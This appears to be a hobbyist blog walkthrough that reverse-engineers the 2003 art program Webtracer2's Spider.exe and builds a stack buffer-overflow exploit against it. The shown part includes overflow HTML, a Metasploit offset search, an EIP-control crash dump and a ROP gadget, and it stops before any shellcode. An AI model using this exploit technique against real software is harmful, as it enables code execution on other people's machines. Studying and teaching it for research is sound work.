.+:::::::::::::::::::::::::::::::::::::::::/
    .//`+++++++++++++++++++++++++++++++++++++// s
    -+/.h+..................................-os s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h/                                   ss s
    -+/.h+                                   ss s
    -++-yo////////////////////////////////////y`s
    -+o-:--------------------------::::-:://:---s
    -+/                            :-.: +:oo-   s
    -+/```````````````````````````````````:-````s
    ./o//////////+o:::::::::::::::::s+/////////::
    ``://////////+s:::::::::::::::::y+/////////:.
      s                        .::::/osso::::. .+
    `.y                        +yyyyhNNNmyyyy+ .+
    `:h:::::/+:::::::::::::+:///////////////////+--------------------
     .o                    s s::::::::::::s.+ - +
    -/y     .o             s ::::::::::::oss+::.+
    `-y     .o             y            `+//:  .+
    `.+/y/::/+:::::::::::::+:::::::::::::::::++:.
        `////////////////////////////////////:/.       
    
    
        
hacktracer
    

This article analyzes and hacks the art browser Webtracer2 by the artist Nullpointer from the year 2003. As he has already described the work on his website, this is shown below. (You might have to open the page in another tab and acceppt the certificate...) This article then goes straight into the analysis.

https://www.nullpointer.co.uk/-/webtracer2.htm

First let's download the webtracer2.zip and unzip it.

The ZIP archive comes of various files. Particularly interesting are the two exe files: Spider.exe and Visualizer.exe. As the name already suggests, one of them spiders a website and the other one visualises the data. Nullpointer also documented and described this in detail on the projects website.

So let's start the analysis with Spider.exe since this is required to run first and comes with more interactive functionality. By this I mean functions like Request a website we can specify and therefore we can control the response which leads us to lots of possible interactions with Spider.exe.

    Binary Orientation Methods

To start the analysis let's open the exe in Ghidra.

Ghidra is a software reverse engineering tool. It helps examine and understand compiled software code, like executable programs and binaries. With Ghidra, machine code can be decompiled into more readable source code.

The following screenshot shows a method to quickly orientate in the EXE file.

- First we search for strings.

- Then doubleclick on a string to jump to it's location. This is most commonly somewhere in the .rdata section.

- Ghidra then shows the XREF (cross reference) location 01_GET_PAGES:00402c19, which means the string is used somewhere else in the binary.

- Another doubleclick on the XREF address brings us to the part of the decompiled code where the string is used. In this case it's the function 01_GET_PAGES which already sound promising.

Now we have some foothold from where we can continue the analysis. This technique is powerfull to quickly find relevant parts of the code in lage binarys.

decompiled code
Find interesting code by XREF strings

In this code we can see that some buffers get created in the beginning and later on functions like strcpy are used.

The official Microsoft documentation writes this hint about the standard C function:

Important: Because strcpy does not check for sufficient space in strDestination before it copies strSource, it is a potential cause of buffer overruns. Therefore, we recommend that you use strcpy_s instead.

This really smells like buffer overflow.



undefined4 __fastcall 01_GET_PAGES(uint param_1)

{
    int iVar1;
    undefined4 uVar2;
    undefined4 auStack1064 [2];
    int iStack1056;
    int iStack1052;
    undefined4 uStack1048;
    char acStack1044 [256];
    undefined auStack788 [256];
    undefined auStack532 [256];
    undefined auStack276 [256];
    int iStack20;
    int iStack16;
    int iStack12;
    uint uStack8;
    
    *(undefined4 *)(param_1 + 4) = 0;
    uStack8 = param_1;
    status_logger("=======================GETTING PAGE========================");
    status_logger(uStack8 + 0x514);
    strncpy(&DAT_012f766c,"not found",9);
    DAT_012f7675 = 0;
    iStack12 = InternetOpenA("webhack",0,0,0,0);
    if (iStack12 == 0) {
        error_logger("InternetOpen() failed");
    }
    uStack1048 = 5000;
    iVar1 = InternetSetOptionA(iStack12,2,&uStack1048,4);
    if (iVar1 == 0) {
        error_logger("InternetConnect() failed");
        InternetCloseHandle(iStack12);
        uVar2 = 0;
    }
    else {
        iVar1 = InternetSetOptionA(iStack12,8,&uStack1048,4);
        if (iVar1 == 0) {
        error_logger("InternetConnect() failed");
        uVar2 = 0;
        }
        else {
        *(undefined4 *)(uStack8 + 0x914) = 0x3c;
        *(undefined **)(uStack8 + 0x918) = auStack276;
        *(undefined4 *)(uStack8 + 0x91c) = 0x100;
        *(undefined **)(uStack8 + 0x924) = auStack532;
        *(undefined4 *)(uStack8 + 0x928) = 0x100;
        *(undefined4 *)(uStack8 + 0x930) = 0;
        *(undefined4 *)(uStack8 + 0x934) = 0;
        *(undefined4 *)(uStack8 + 0x938) = 0;
        *(undefined4 *)(uStack8 + 0x93c) = 0;
        *(undefined **)(uStack8 + 0x940) = auStack788;
        *(undefined4 *)(uStack8 + 0x944) = 0x100;
        *(undefined4 *)(uStack8 + 0x948) = 0;
        *(undefined4 *)(uStack8 + 0x94c) = 0;
        iVar1 = InternetCrackUrlA(uStack8 + 0x514,0,0,uStack8 + 0x914);
        if (iVar1 == 0) {
            error_logger("InternetCrackURL() failed");
            InternetCloseHandle(iStack12);
            uVar2 = 0;
        }
        else {
            strcpy((char *)(uStack8 + 0x614),*(char **)(uStack8 + 0x940));
            strcpy((char *)(uStack8 + 0x414),*(char **)(uStack8 + 0x924));
            if (*(int *)(uStack8 + 0x920) == 3) {
            iStack16 = InternetConnectA(iStack12,auStack532,
                                        uStack8 & 0xffff0000 | (uint)*(ushort *)(uStack8 + 0x92c),0,0,
                                        3,0,0);
            if (iStack16 == 0) {
                error_logger("InternetConnect() failed");
                InternetCloseHandle(iStack12);
                uVar2 = 0;
            }
            else {
                iStack20 = HttpOpenRequestA(iStack16,&DAT_00418784,auStack788,0,0,0,0,0);
                if (iStack20 == 0) {
                error_logger("HttpOpenRequest() failed");
                InternetCloseHandle(iStack12);
                uVar2 = 0;
                }
                else {
                iVar1 = HttpSendRequestA(iStack20,0,0,0,0);
                if (iVar1 == 0) {
                    error_logger("HttpSendRequest() failed:");
                    InternetCloseHandle(iStack12);
                    uVar2 = 0;
                }
                else {
                    auStack1064[0] = 0x100;
                    iVar1 = HttpQueryInfoA(iStack20,0x14,uStack8 + 0x210,auStack1064,0);
                    if (iVar1 == 0) {
                    error_logger("HttpQueryInfo() failed: ");
                    InternetCloseHandle(iStack12);
                    uVar2 = 0;
                    }
                    else {
                    auStack1064[0] = 4;
                    iVar1 = HttpQueryInfoA(iStack20,0x20000013,uStack8 + 0x410,auStack1064,0);
                    if (iVar1 == 0) {
                        error_logger("HttpQueryInfo() failed: Couldn\'t get statusCODE ");
                        InternetCloseHandle(iStack12);
                        uVar2 = 0;
                    }
                    else if (*(int *)(uStack8 + 0x410) == 200) {
                        thunk_FUN_00403280();
                        auStack1064[0] = 100000;
                        iStack1056 = InternetReadFile(iStack20,acStack1044,0xff,&iStack1052);
                        if (iStack1056 == 0) {
                        error_logger("InternetReadFile() failed: didn\'t get page");
                        InternetCloseHandle(iStack12);
                        uVar2 = 0;
                        }
                        else {
                        acStack1044[iStack1052] = '\0';
                        strcpy(&DAT_012f766c,acStack1044);
                        *(int *)(uStack8 + 8) = *(int *)(uStack8 + 8) + iStack1052;
                        while (((iStack1052 != 0 && (iStack1052 != 0)) &&
                                (*(int *)(uStack8 + 8) < 0x185a1))) {
                            iStack1056 = InternetReadFile(iStack20,acStack1044,0xff,&iStack1052);
                            acStack1044[iStack1052] = '\0';
                            (&DAT_012f766c)[*(int *)(uStack8 + 8)] = 0;
                            strcat(&DAT_012f766c,acStack1044);
                            *(int *)(uStack8 + 8) = *(int *)(uStack8 + 8) + iStack1052;
                        }
                        (&DAT_012f766b)[*(int *)(uStack8 + 8)] = 0x78;
                        (&DAT_012f766c)[*(int *)(uStack8 + 8)] = 0;
                        InternetCloseHandle(iStack12);
                        status_logger("got page");
                        status_logger(uStack8 + 0x110);
                        uVar2 = 1;
                        }
                    }
                    else {
                        error_logger("File Not Found");
                        InternetCloseHandle(iStack12);
                        uVar2 = 1;
                    }
                    }
                }
                }
            }
            }
            else {
            error_logger("USE HTTP-URL Local-File");
            InternetCloseHandle(iStack12);
            uVar2 = 0;
            }
        }
        }
    }
    return uVar2;
    }
    

Another method to identify interesting part of the code is similar. But this time we trace not strings but function calls in the imported librarys. Here we use for example the strcmp function.

- Expand the Symbol Tree in Ghridra on the left and search for interesting function names

- Use the XREF / Cross Reference to navigate to the part of code where the interesting function is used

In other binarys this is a good method to identify a call to some network connection function. First locate the socket connection library function. Then it can be traced back via the XREFs until a relevant part of the custom code is reached. The custom code where a network connection is initialised is often a good starting point for reversing around protokolls. This may also be a good spot for a breakpoint in further dynamic analysis with a debugger.

decompiled code
Find interesting code by XREF function calls in libs
    Dynamic Analysis

Now we peaked into the decompiled source code and browsed a little bit through the binary. But to get more impressions of the whole picture, let's do some dynamic analysis.

First we proxy the traffic through Burp.

Add "127.0.0.1 hacking.art" to /etc/hosts, you know the game.

Another interesting method to proxy client applications is this tool: https://www.proxifier.com/. Which can be usefull if the hosts file can not be used or if various urls should be requested independent from Burp proxy forwarding configuration.

Anyways, in the end there is nothing more happening than a simple GET request:


GET / HTTP/1.1
User-Agent: webhack
Host: hacking.art
Connection: close

We can intercept the response also and manually tamper with the HTTP and HTML to provoke some reactions. This is manual and repeating and most likely get's us nowhere in a reasonable timeframe. Nevertheless good practice and mabye good for a lucky quickwin.

To automate more we can use a similar attempt to the fuzzing showed in Weirdstalker. But to find a vulnerability I really don't even needed fuzzing.

Before we exlploit the programm however, let's have a little bit fun with it.

I reused my fuzzing code mentioned above and modified it to generate pages for the Spider on the fly. This means the Spider requests up to 1000 pages and all of them have random links.

# load the needed librarys
import socket
import threading
import importlib
import mylib

# prepare the socket to send data via TCP
bind_ip = "0.0.0.0"
bind_port = 80
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# this will open a port on the system and waits for a connection from webstalker
server.bind((bind_ip,bind_port))
server.listen(5)

# if a client connects:
def handle_client(client_socket):

    importlib.reload(mylib)

    html = mylib.html()

    # receiving whatever the client talks
    request = client_socket.recv(1024)
    print(f"sending {len(html)} bytes")
    # send data (pls crash) and close the connection
    client_socket.send(html)
    client_socket.close()

# some multi threaded client handling
while True:
    client,addr = server.accept()
    print(f"[*] Accepted connection from: {addr[0]}:{addr[1]}")
    client_handler = threading.Thread(target=handle_client,args=(client,))
    client_handler.start()

To not stop and start the script every time we want to make a change in the HTML, we reload the second part as a library at runtime. This allows to modify the second script while the server is running and when we call it with a browser it gets loaded.

import random
import string
import uuid
from itertools import product
from string import ascii_lowercase, digits

def html():
    html = b"HTTP/1.0 200 OK\r\nServer: tracefun\r\n\r\n"
    html += b"""<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>
"""
    html += gentracefun()
    html += b"""
</body>
</html>
    """
    return html


def gentracefun():

    keywords = [''.join(i) for i in product(ascii_lowercase + digits, repeat = 3)]
    linkcounter = 100
    html = b""

    for i in range(0,linkcounter):

        html += f"<a href=\"http://{random.choice(keywords)}\">{random.choice(keywords)}</a>".encode()
        html += b"\n"

    return html

In this case the code generates 100 random links. When requested by Spider.exe, it follows the links and therefore in the end a visualisation with 100 dots and lines gets generated. But it's also possible to generate more complex pages with nested layers of links and logic depending on what link is requested. The following code shows an example:

def parseGETparam(request):
    print(f"REQUEST: {request}")
    param = request.split(b"HTTP/")[0].split(b" ")[1][1:]
    print(f"PARAM: {param}")
    return param

def gentracefun1():
    # linkcounter = random.randrange(1, 20)
    linkcounter = 100
    html = b""
    for i in range(0,linkcounter):
        #a = random.choice(string.ascii_letters)
        #b = random.choice(string.ascii_letters)
        #c = random.choice(string.ascii_letters)
        html += f"<a href=\"/{uuid.uuid4()}\">{uuid.uuid4()}</a>".encode()
        html += b"\n"
    return html

def fibonacci_of(n):
    if n in {0, 1}:  # Base case
        return n
    return fibonacci_of(n - 1) + fibonacci_of(n - 2)

fiborange = 25

fibo = [fibonacci_of(n) for n in range(fiborange)]

def gentracefun(request):
    html = b""
    #print(request)
    p = parseGETparam(request)

    try:
        p = int(p)
        if p > fiborange:
            return b""

        for f in range(fibo[p]):
            #print()
            html += f"<a href=\"/{uuid.uuid4()}\">{uuid.uuid4()}</a>".encode()
            html += b"\n"
    except:
        for f in range(len(fibo)):
            html += f"<a href=\"/{f}\">{f}</a>".encode()
            html += b"\n"
   
    return html # b"a" # str(fibo[p]).encode()

This resulting in HTML like the following:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>
<a href="/0">0</a>
<a href="/1">1</a>
<a href="/2">2</a>
<a href="/3">3</a>
<a href="/4">4</a>
<a href="/5">5</a>
<a href="/6">6</a>
<a href="/7">7</a>
<a href="/8">8</a>
<a href="/9">9</a>
<a href="/10">10</a>
<a href="/11">11</a>
<a href="/12">12</a>
<a href="/13">13</a>
<a href="/14">14</a>
<a href="/15">15</a>
<a href="/16">16</a>
<a href="/17">17</a>
<a href="/18">18</a>
<a href="/19">19</a>
<a href="/20">20</a>
<a href="/21">21</a>
<a href="/22">22</a>
<a href="/23">23</a>
<a href="/24">24</a>

</body>
</html>

Clicking on a link then shows the following for example, depending on which number:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>
<a href="/5c656906-c194-4413-a3d4-bfa1344e7b79">d77d5e6e-69e2-4d69-aa8a-b15f0292ff2a</a>
<a href="/29ba3c28-a0a0-49f5-9a02-a83091fdd82f">7e6f92f5-2054-4ba7-82ba-08818fd77ff3</a>
<a href="/8340eca3-208a-47a5-997a-7157145ed0c3">969520d4-1ffb-4f80-b62a-fa5d62f7176e</a>
<a href="/b8775af9-4a10-4b52-a9c9-d66f8c680b99">075a737b-5fa9-4623-800f-62d5176440ee</a>
<a href="/12642ddf-ef3c-421b-887d-35184ce08c41">c70d9c4b-3ad6-4016-a2ac-0f9dea58c978</a>

</body>
</html>

For the Spider.exe this results in quite some work, because the higher numbers in fibonacci generates a lot of links.

But in the end the Visualiser produces some nice structures from this data.

Fibonacci HTML links visualized
Hundreds of generated linked pages visualized
    Luck Buffer Overflow

Now let's get to the fun part. As mentioned above, in the decompiled code we saw some dangerous functions like strcpy. As long as we follow the common HTML code structure the Spider.exe eats it. Our hundreds of randomly generated links were slow but processed in the end.

So what if we "break" the structure?

There are two possible breaking points. On the one hand the HTTP headers and on the other hand some "experimental" HTML code. Let's try something like the following and hope Spider.exe chokes on something:

    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Test</title>
    </head>
    <body>
    
        <a href="dummy"></a>
        <a                                                                                                                                                                                                                                                                        href="dummy"></a>
        <a href="                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "></a>
        <a href="http://11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"></a>
        <a href=""2"></a>a
        <a href=="3"></a>
        <a hreasdf="4"></a>
        <aa href="5"></a>
        <a hr ef="6"></a>
        <a href="7 "></a>
        and so on...

And indeed. It really was my first attempt. The HTML was loaded and the debugger showed EXCEPTION_ACCESS_VIOLATION. EDX gets overwritten with 41414141 in the imported library MSVCRTD.DLL. That is something we can work with.

Another method to get and analyse crashes of a program is via Microsoft Windows Crashdumps. This has to be enabled in the Registry as described here: https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps.

Now if the app crashes a memory dump gets created in %HOMEPATH%\AppData\Local\CrashDumps. The Dumps can be analyzed with Microsofts WinDBG tool. https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools The following Screenshot shows the overflow too.

Key in Registry
Crashdump in WinDBG

Now whats interesting is that the application is not stopping immediately at the first EXCEPTION_ACCESS_VIOLATION. Propably it's only the DLL that crashes. The execution returns to Spider.exe and crashes a second time. Also a second crash dump gets created.

And the second crash happens because back in Spider.exe this cheeky little piece of code wants to be executed:

    77D88A8C | 55                       | push ebp                     
    77D88A8D | 8BEC                     | mov ebp,esp                  
    77D88A8F | FF75 0C                  | push dword ptr ss:[ebp+C]    
    77D88A92 | 52                       | push edx                     
    77D88A93 | 64:FF35 00000000         | push dword ptr fs:[0]        
    77D88A9A | 64:8925 00000000         | mov dword ptr fs:[0],esp     
    77D88AA1 | FF75 14                  | push dword ptr ss:[ebp+14]   
    77D88AA4 | FF75 10                  | push dword ptr ss:[ebp+10]   
    77D88AA7 | FF75 0C                  | push dword ptr ss:[ebp+C]    
    77D88AAA | FF75 08                  | push dword ptr ss:[ebp+8]    
    77D88AAD | 8B4D 18                  | mov ecx,dword ptr ss:[ebp+18]
    77D88AB0 | FFD1                     | call ecx                     

The second last instruction writes 41414141 to ECX and the last call instruction tries to execute code there. This means EIP now is 41414141 and we directly control the execution flow.

What a lucky shot!!!

EIP gets overwritten with 41414141
EIP gets overwritten with 41414141
    Crafting the Exploit

To craft a fully working exploit we need to find the right offset to inject our shellcode. For this we can use Metasploits pattern_create This is a tool that creates a string with a given length and a specific pattern. Afterwards EIP gets overwritten with a small but recognisable part of the pattern. This part can be searched in the original pattern wich leads to the exact offset at which byte the buffer but more important the EIP register gets overwritten.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 10000

The generated HTML looks like the following. Note the first line <a -- around 260 spaces -- href="dummy"></a> is necessary for the overflow to work.

<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>

    <a                                                                                                                                                                                                                                                                        href="dummy"></a>
    <a href="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1

Another look in the CrashDump reveals the exact byte offset overriding EIP.

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6b43356b
[*] Exact match at offset 1876

Another look in the CrashDump reveals the exact byte offset overriding EIP. Let's confirm that by writing CCCC respectively 43434343 to EIP. It works perfectly as the crashdump shows:

This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(3574.1580): Access violation - code c0000005 (first/second chance not available)
For analysis of this file, run !analyze -v
eax=00000000 ebx=00000000 ecx=43434343 edx=77d88ad0 esi=00000000 edi=00000000
eip=43434343 esp=000a16d0 ebp=000a16f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
43434343 ??              ???

Now we just need to jump to somewhere we can write to. Unfortunately the stack addresses begin with a nullbyte. For example: 0019F6C8, which is directly behind the overflow offset. This means we can not just write this address to EIP. We have to get a little bit creative.

At the time of the call ECX instruction gets executed there are a few stack addresses on the stack. One of them can possibly be used for the exploit: 0019F6C0. It is the second address on the stack at this point.

Stack address to return to
Stack address to return to

This means we need a gadget that pops two registers and then return. Pop the first one that got pushed because of the call ECX. Pop the second one behind and return to the third which we control as it is right before the overflow offset. This gadget should not have a nullbyte too.

To search for a sufficient gadget we can use a ROPgadget Tool

└─$ ROPgadget --binary MSVCRTD.DLL --depth 5 --console
(ROPgadget)> load
[+] Loading gadgets, please wait...
[+] Gadgets loaded !
(ROPgadget)> search pop ; pop ; ret
[...]
0x10217b07 : pop esi ; pop edi ; ret

It seems we have found a candidate in MSVCRTD.DLL. Instead of CCCC we can now write \x07\x7b\x21\x10 at the offset.

